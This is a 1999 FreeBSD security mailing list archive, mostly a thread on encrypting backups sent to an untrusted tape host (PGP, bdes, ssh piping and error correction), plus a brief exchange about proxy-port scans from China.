1649 invoked from network); 17 May 1999 00:56:58 -0000 Received: from mojo.calyx.net (lists@208.132.136.2) by mojo.calyx.net with SMTP; 17 May 1999 00:56:58 -0000 Date: Sun, 16 May 1999 20:56:58 -0400 (EDT) From: Nicholas Merrill To: Joe Gleason Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <006b01be9fff$ee9176e0$7271a1ce@tasam.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org you could try substituting BRU (www.estinc.com) for tar. BRU is much better at recovering from errors, and does checksums ---------------------------------------------------------------------------- Nicholas Merrill http://www.calyx.net Voice: 212-966-1900 President / CEO http://www.calyx.nl Fax : 212-966-3965 Calyx Internet Access 13 Laight St. NYC, NY 10013 Email: nick@calyx.net ---------------------------------------------------------------------------- On Sun, 16 May 1999, Joe Gleason wrote: > I backup my workstation via piping a tar output through pgp. I never > throught about the data error possiblity. It would be inclined to let > tcp handle it. > > If that doesn't meet your needs, you could setup something completely > insane with shell scripting. (My answer to every problem). > > The script could do something like this, > on the machine with the files to backup (I'll call it A) > > it will run a find, and do a for loop on the output of that find. For > each of these files, it will pgp the file and send it to B (system > receiving backup) > > The sending can go something like this, A connects to B on port x and > sends the filename that it is about to send. Then A connects to B on > port y and sends the data. B saves the file that is receives on y as > the name is was given on x and then adds this file to a tarball. > > This connection from A to B can be done via faucet and hose. > > This way, the final product will be a tarball on B that has each file > encrypted and separate. > > There would be alot of security issues in making sure that A cannot be > spoofed to send odd things to B to compromise it via ports x and y, > but that could be handled with setting the remote host in faucet, > maybe ipfw and general sanity checks on anything comming into B. > > My ramblings for the day. > > Joe Gleason > Tasam > > ----- Original Message ----- > From: > To: > Sent: Sunday, May 16, 1999 20:14 > Subject: secure backup > > > > Can anyone recommend how I should go about creating a backup to an > untrusted > > machine that has the tape drive, and using an untrusted network. > > > > I'm a bit wary of encrypting the output of tar or dump, as a single > byte error > > would make the rest of the backup useless. I'd like to encrypt > (pgp?) each > > file separately as I go, so that a corrupted byte affects only one > file on > > retrieval. Is there an existing way to do this, or should I hack > tar or dump > > into doing it? > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:58:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id DCE5D14BED for ; Sun, 16 May 1999 17:58:38 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by tasam.com (8.9.3/8.9.1) with SMTP id UAA15848; Sun, 16 May 1999 20:58:25 -0400 (EDT) Message-ID: <008101bea000$637a5bc0$7271a1ce@tasam.com> From: "Joe Gleason" To: "Nicholas Merrill" Cc: , References: Subject: Re: secure backup Date: Sun, 16 May 1999 20:58:30 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org But that wouldn't be nearly as much fun! ----- Original Message ----- From: Nicholas Merrill To: Joe Gleason Cc: ; Sent: Sunday, May 16, 1999 20:56 Subject: Re: secure backup > > you could try substituting BRU (www.estinc.com) for tar. BRU is much > better at recovering from errors, and does checksums > > -------------------------------------------------------------------- -------- > Nicholas Merrill http://www.calyx.net Voice: 212-966-1900 > President / CEO http://www.calyx.nl Fax : 212-966-3965 > Calyx Internet Access 13 Laight St. NYC, NY 10013 Email: nick@calyx.net > -------------------------------------------------------------------- -------- > > On Sun, 16 May 1999, Joe Gleason wrote: > > > I backup my workstation via piping a tar output through pgp. I never > > throught about the data error possiblity. It would be inclined to let > > tcp handle it. > > > > If that doesn't meet your needs, you could setup something completely > > insane with shell scripting. (My answer to every problem). > > > > The script could do something like this, > > on the machine with the files to backup (I'll call it A) > > > > it will run a find, and do a for loop on the output of that find. For > > each of these files, it will pgp the file and send it to B (system > > receiving backup) > > > > The sending can go something like this, A connects to B on port x and > > sends the filename that it is about to send. Then A connects to B on > > port y and sends the data. B saves the file that is receives on y as > > the name is was given on x and then adds this file to a tarball. > > > > This connection from A to B can be done via faucet and hose. > > > > This way, the final product will be a tarball on B that has each file > > encrypted and separate. > > > > There would be alot of security issues in making sure that A cannot be > > spoofed to send odd things to B to compromise it via ports x and y, > > but that could be handled with setting the remote host in faucet, > > maybe ipfw and general sanity checks on anything comming into B. > > > > My ramblings for the day. > > > > Joe Gleason > > Tasam > > > > ----- Original Message ----- > > From: > > To: > > Sent: Sunday, May 16, 1999 20:14 > > Subject: secure backup > > > > > > > Can anyone recommend how I should go about creating a backup to an > > untrusted > > > machine that has the tape drive, and using an untrusted network. > > > > > > I'm a bit wary of encrypting the output of tar or dump, as a single > > byte error > > > would make the rest of the backup useless. I'd like to encrypt > > (pgp?) each > > > file separately as I go, so that a corrupted byte affects only one > > file on > > > retrieval. Is there an existing way to do this, or should I hack > > tar or dump > > > into doing it? > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 18:51:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id D506F14FC7 for ; Sun, 16 May 1999 18:51:25 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id UAA04558; Sun, 16 May 1999 20:51:19 -0500 (CDT) From: Igor Roshchin Message-Id: <199905170151.UAA04558@alecto.physics.uiuc.edu> Subject: Re: secure backup In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz> from "nr1@ihug.co.nz" at "May 17, 1999 12:14:19 pm" To: nr1@ihug.co.nz Date: Sun, 16 May 1999 20:51:19 -0500 (CDT) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If both machines are Unix - you can use SSH. I am using the following script: (from the machine that I backup) (Written for FreeBSD - so, you might want to optimize it differently - if you using some other Unix - you might want to adjust the size of the buffer) ------------------------------- #!/bin/csh -f # set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0" echo starting MyMachine date dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH -------------------------------- (backup - is the account of the user on the machine "tape-machine.com" - the one which has the tape driver attached) Hope, this helps, IgoR > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. > > I'm a bit wary of encrypting the output of tar or dump, as a single byte error > would make the rest of the backup useless. I'd like to encrypt (pgp?) each > file separately as I go, so that a corrupted byte affects only one file on > retrieval. Is there an existing way to do this, or should I hack tar or dump > into doing it? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 19:10: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id BECF015059 for ; Sun, 16 May 1999 19:10:01 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id WAA01870; Sun, 16 May 1999 22:23:25 -0400 (EDT) Date: Sun, 16 May 1999 22:23:25 -0400 From: Adam Shostack To: Igor Roshchin Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990516222325.A1851@weathership.homeport.org> References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <199905170151.UAA04558@alecto.physics.uiuc.edu>; from Igor Roshchin on Sun, May 16, 1999 at 08:51:19PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ssh does not help; the host the tape is atatched to is untrusted. Adam On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote: | | | If both machines are Unix - you can use SSH. | | I am using the following script: | (from the machine that I backup) | (Written for FreeBSD - so, you might want to optimize it differently - | if you using some other Unix - you might want to adjust the size of the buffer) | | ------------------------------- | #!/bin/csh -f | # | set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0" | echo starting MyMachine | date | dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH | dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH | dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH | dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH | -------------------------------- | | | (backup - is the account of the user on the machine "tape-machine.com" - | the one which has the tape driver attached) | | Hope, this helps, | | IgoR | | > Can anyone recommend how I should go about creating a backup to an untrusted | > machine that has the tape drive, and using an untrusted network. | > | > I'm a bit wary of encrypting the output of tar or dump, as a single byte error | > would make the rest of the backup useless. I'd like to encrypt (pgp?) each | > file separately as I go, so that a corrupted byte affects only one file on | > retrieval. Is there an existing way to do this, or should I hack tar or dump | > into doing it? | > | > | > | > To Unsubscribe: send mail to majordomo@FreeBSD.org | > with "unsubscribe freebsd-security" in the body of the message | > | | | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 19:19:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 6932315059 for ; Sun, 16 May 1999 19:19:24 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id WAA01918; Sun, 16 May 1999 22:33:23 -0400 (EDT) Date: Sun, 16 May 1999 22:33:23 -0400 From: Adam Shostack To: nr1@ihug.co.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990516223322.B1851@weathership.homeport.org> References: <199905170014.MAA18766@smtp1.ihug.co.nz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz>; from nr1@ihug.co.nz on Mon, May 17, 1999 at 12:14:19PM +1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You're worried about errors on the tape, I presume? You could pipe the output of pgp through something that does redundant encoding, such that errors on the tape are recoverable outside the tape. There are some direct tradeoffs that you can find between bloat and recoverability; as you add bits, your odds of being able to reconstruct increase. Adam On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote: | Can anyone recommend how I should go about creating a backup to an untrusted | machine that has the tape drive, and using an untrusted network. | | I'm a bit wary of encrypting the output of tar or dump, as a single byte error | would make the rest of the backup useless. I'd like to encrypt (pgp?) each | file separately as I go, so that a corrupted byte affects only one file on | retrieval. Is there an existing way to do this, or should I hack tar or dump | into doing it? -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 20:14:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id DEDFD1548A for ; Sun, 16 May 1999 20:14:29 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA23046; Mon, 17 May 1999 12:44:27 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA01394; Mon, 17 May 1999 12:45:09 +0930 Date: Mon, 17 May 1999 12:45:09 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Adam Shostack Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <19990516223322.B1851@weathership.homeport.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 16 May 1999, Adam Shostack wrote: > You're worried about errors on the tape, I presume? You could > pipe the output of pgp through something that does redundant encoding, > such that errors on the tape are recoverable outside the tape. There > are some direct tradeoffs that you can find between bloat and > recoverability; as you add bits, your odds of being able to > reconstruct increase. Pipe the output of dump or tar or whatever you're using through bdes(1). You don't need the overhead of PGP unless you want a trusted third party to read the backup without knowing the encryption key. Pass the data through three rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do natively. Make the keys random, and stick those in a PGP file if you like. Hmm, there seems to be a void of any general-purpose tools which provide error-correcting data encoding - but in this case do you really need it? It'll only multiply the size of your backup, and if you're using a reliable transport protocol between client and server (i.e. TCP) then this shouldn't be an issue. If your tape is dropping bits, then it would be a big problem if you were using it in the normal way (attached to local computer). I suppose the untrusted server could cause your data stream to be corrupted, but they could also cause it to never make the tape in the first place. Transport the data stream to the server using ssh -c none (no need for the overhead of another encryption layer unless you're really paranoid) - this still authenticates via RSA, so you have at least some assurance that no-one else can be sending data to the tape except you (the backup server process could have been silently replaced, so you don't actually know that your data is going to the tape, but I don't think it'd be easy to verify this). Of course, a malicious (super-)user could reverse-engineer the backup process on ther server and modify it to nullify ANY authentication measures (easy if this is a shell script) - so you can't really be sure that no-one else is writing data onto the tape, only that the data you do write which ends up on the tape is secure from decryption. In summary, there's only so much you can do if you don't trust the server - you still have to trust them to provide basic functions like actually writing your data to the tape. Kris > > Adam > > > On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote: > | Can anyone recommend how I should go about creating a backup to an untrusted > | machine that has the tape drive, and using an untrusted network. > | > | I'm a bit wary of encrypting the output of tar or dump, as a single byte error > | would make the rest of the backup useless. I'd like to encrypt (pgp?) each > | file separately as I go, so that a corrupted byte affects only one file on > | retrieval. Is there an existing way to do this, or should I hack tar or dump > | into doing it? > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 21:46:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from xanadu.io.com (xanadu.io.com [199.170.88.102]) by hub.freebsd.org (Postfix) with ESMTP id DAD3814D4A for ; Sun, 16 May 1999 21:46:25 -0700 (PDT) (envelope-from zippo@caffeine.io.com) Received: from caffeine.io.com (zippo@caffeine.io.com [199.170.88.30]) by xanadu.io.com (8.9.3/8.9.3) with ESMTP id XAA28993 for ; Sun, 16 May 1999 23:47:11 -0500 Received: (from zippo@localhost) by caffeine.io.com (8.9.0/8.9.0) id XAA03260 for freebsd-security@FreeBSD.ORG; Sun, 16 May 1999 23:48:27 -0500 Message-ID: <19990516234827.A2021@io.com> Date: Sun, 16 May 1999 23:48:27 -0500 From: "Isaac D. Kishk" To: freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu> <19990516222325.A1851@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990516222325.A1851@weathership.homeport.org>; from Adam Shostack on Sun, May 16, 1999 at 10:23:25PM -0400 X-URL: http://www.io.com/~kazi Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Small fundamental question... how would you trust the tape if the machine the tape is attached to is untrusted? Adam Shostack emailed the following on Sun, May 16, 1999 at 10:23:25PM -0400: [ ssh does not help; the host the tape is atatched to is untrusted. [ [ Adam [ [ On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote: [ | [ | [ | If both machines are Unix - you can use SSH. [ | [ | I am using the following script: [ | (from the machine that I backup) [ | (Written for FreeBSD - so, you might want to optimize it differently - [ | if you using some other Unix - you might want to adjust the size of the buffer) [ | [ | ------------------------------- [ | #!/bin/csh -f [ | # [ | set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0" [ | echo starting MyMachine [ | date [ | dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH [ | dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH [ | dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH [ | dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH [ | -------------------------------- [ | [ | [ | (backup - is the account of the user on the machine "tape-machine.com" - [ | the one which has the tape driver attached) [ | [ | Hope, this helps, [ | [ | IgoR [ | [ | > Can anyone recommend how I should go about creating a backup to an untrusted [ | > machine that has the tape drive, and using an untrusted network. [ | > [ | > I'm a bit wary of encrypting the output of tar or dump, as a single byte error [ | > would make the rest of the backup useless. I'd like to encrypt (pgp?) each [ | > file separately as I go, so that a corrupted byte affects only one file on [ | > retrieval. Is there an existing way to do this, or should I hack tar or dump [ | > into doing it? [ | > [ | > [ | > [ | > To Unsubscribe: send mail to majordomo@FreeBSD.org [ | > with "unsubscribe freebsd-security" in the body of the message [ | > [ | [ | [ | [ | [ | To Unsubscribe: send mail to majordomo@FreeBSD.org [ | with "unsubscribe freebsd-security" in the body of the message [ [ -- [ "It is seldom that liberty of any kind is lost all at once." [ -Hume [ [ [ [ [ To Unsubscribe: send mail to majordomo@FreeBSD.org [ with "unsubscribe freebsd-security" in the body of the message -- /****************************************************** ***** /\ **** Isaac D. Kishk - IDK5 - zippo@io.com *** **** / \ *** Senior Network / Systems Administrator ** *** / () \ ** http://www.io.com/~zippo **************** ** /______\ * 512.462.0999 - 512.462.0356(fax) ******** ******************************************************/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 21:54:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.enteract.com (thor.enteract.com [207.229.143.11]) by hub.freebsd.org (Postfix) with SMTP id B004F151F5 for ; Sun, 16 May 1999 21:54:26 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 28226 invoked from network); 17 May 1999 04:54:25 -0000 Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by thor.enteract.com with SMTP; 17 May 1999 04:54:25 -0000 Received: from localhost (dscheidt@localhost) by shell-2.enteract.com (8.9.3/8.9.2) with SMTP id XAA42878; Sun, 16 May 1999 23:54:25 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-2.enteract.com: dscheidt owned process doing -bs Date: Sun, 16 May 1999 23:54:25 -0500 (CDT) From: David Scheidt To: "Isaac D. Kishk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <19990516234827.A2021@io.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 16 May 1999, Isaac D. Kishk wrote: :Small fundamental question... how would you trust the tape if the machine :the tape is attached to is untrusted? : I can see situations where you can trust that the tape will be made properly, but can't trust that someone won't have a look at the data while it crosses the wire, is on the tapehost, or on the tape. A remote datacenter is one likely possibility. David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 3:16:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 01F7A14A2F for ; Mon, 17 May 1999 03:16:16 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:35597 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8020-32302>; Mon, 17 May 1999 12:15:58 +0200 Message-ID: <373FEC63.D579485D@vangelderen.org> Date: Mon, 17 May 1999 12:16:03 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Sun, 16 May 1999, Adam Shostack wrote: > > > You're worried about errors on the tape, I presume? You could > > pipe the output of pgp through something that does redundant > > encoding, such that errors on the tape are recoverable outside > > the tape. There are some direct tradeoffs that you can find > > between bloat and recoverability; as you add bits, your odds > > of being able to reconstruct increase. > > Pipe the output of dump or tar or whatever you're using through > bdes(1). You don't need the overhead of PGP unless you want a > trusted third party to read the backup without knowing the > encryption key. PGP provides a password based encryption mode, just use that, you will still benefit from PGPs compression and checksumming facilities. > Pass the data through three > rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different > keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do > natively. Make the keys random, and stick those in a PGP file if you like. If you assume PGP is available, why not just use it? Using bdes(1) in this setup sounds way more complicated (thus error-prone) to me. > Transport the data stream to the server using ssh -c none (no need for the > overhead of another encryption layer unless you're really paranoid) Just being cautious is enough. Adding a layer of SSH encryption will at least twarth offline dictionary attacks on the backup passphrase. Encryption is cheap, why disable it if you don't have to? Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:10:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id CAA4B14BF4 for ; Mon, 17 May 1999 06:09:15 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id OAA01246 for freebsd-security@FreeBSD.ORG; Mon, 17 May 1999 14:04:43 +0100 (BST) From: Kiril Mitev Message-Id: <199905171304.OAA01246@idea.co.uk> Subject: Re: network scan? To: freebsd-security@FreeBSD.ORG Date: Mon, 17 May 1999 14:04:43 +0100 (BST) In-Reply-To: <373E46FD.72E41F3F@softweyr.com> from "Wes Peters" at May 15, 99 10:18:05 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Harold Gutch wrote: > > > > On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote: > > > Kris Kennaway wrote: > > > > On Wed, 12 May 1999, Matthew Dillon wrote: > > > > > > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > > > > :a.b.c.1:1080 in via ed0 > > > > > :... > > > > > > > > > > I get this all the time from people scanning for netbios. I > > > > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > > > > to the originating network. > > > > > > > > In this case they're looking for an open SOCKS proxy (so they can use it to > > > > > > In this particular case, it's a site in China. They have a heavily > > > censored internet gateway, and I see lots of probes from china (and other > > > areas in Asia that have enforced proxy use and heavily censored feeds) > > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > > > proxies including netscape). They are scanning for relays to bounce > > > connections off to bypass the censored feed. > > > > > Just to make sure I'm getting this right - you're saying China > > has a censored internet gateway (i.e. blocking *something* [what > > exactly ?] ), but they do allow connections to ports 1080, 3128 > > and 8080 ? > > They block access to sites, not to ports. In particular, sites that > carry capitalist misinformation, or what we in the free world call > "news." Hmm, but who can tell where EXACTLY *they* are trying to go to ? As in, can you see things like 'www.abc.com' and such ? Or is more like along the lines of www.max-XXX.org - you get the idea ? Just wondering out loud... K To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:15:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id E920214CE9 for ; Mon, 17 May 1999 06:15:31 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA02326; Mon, 17 May 1999 09:29:33 -0400 (EDT) Date: Mon, 17 May 1999 09:29:33 -0400 From: Adam Shostack To: "Isaac D. Kishk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517092933.A2322@weathership.homeport.org> References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu> <19990516222325.A1851@weathership.homeport.org> <19990516234827.A2021@io.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <19990516234827.A2021@io.com>; from Isaac D. Kishk on Sun, May 16, 1999 at 11:48:27PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You don't need to. The data is encrypted and signed. (Thats the benefit of using pgp over bdes; you can sign the data as it goes to tape.) Adam On Sun, May 16, 1999 at 11:48:27PM -0500, Isaac D. Kishk wrote: | | Small fundamental question... how would you trust the tape if the machine | the tape is attached to is untrusted? | | Adam Shostack emailed the following on Sun, May 16, 1999 at 10:23:25PM -0400: | | [ ssh does not help; the host the tape is atatched to is untrusted. | [ | [ Adam | [ | [ On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote: | [ | | [ | | [ | If both machines are Unix - you can use SSH. | [ | | [ | I am using the following script: | [ | (from the machine that I backup) | [ | (Written for FreeBSD - so, you might want to optimize it differently - | [ | if you using some other Unix - you might want to adjust the size of the buffer) | [ | | [ | ------------------------------- | [ | #!/bin/csh -f | [ | # | [ | set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0" | [ | echo starting MyMachine | [ | date | [ | dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH | [ | dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH | [ | dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH | [ | dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH | [ | -------------------------------- | [ | | [ | | [ | (backup - is the account of the user on the machine "tape-machine.com" - | [ | the one which has the tape driver attached) | [ | | [ | Hope, this helps, | [ | | [ | IgoR | [ | | [ | > Can anyone recommend how I should go about creating a backup to an untrusted | [ | > machine that has the tape drive, and using an untrusted network. | [ | > | [ | > I'm a bit wary of encrypting the output of tar or dump, as a single byte error | [ | > would make the rest of the backup useless. I'd like to encrypt (pgp?) each | [ | > file separately as I go, so that a corrupted byte affects only one file on | [ | > retrieval. Is there an existing way to do this, or should I hack tar or dump | [ | > into doing it? | [ | > | [ | > | [ | > | [ | > To Unsubscribe: send mail to majordomo@FreeBSD.org | [ | > with "unsubscribe freebsd-security" in the body of the message | [ | > | [ | | [ | | [ | | [ | | [ | To Unsubscribe: send mail to majordomo@FreeBSD.org | [ | with "unsubscribe freebsd-security" in the body of the message | [ | [ -- | [ "It is seldom that liberty of any kind is lost all at once." | [ -Hume | [ | [ | [ | [ | [ To Unsubscribe: send mail to majordomo@FreeBSD.org | [ with "unsubscribe freebsd-security" in the body of the message | | -- | /****************************************************** | ***** 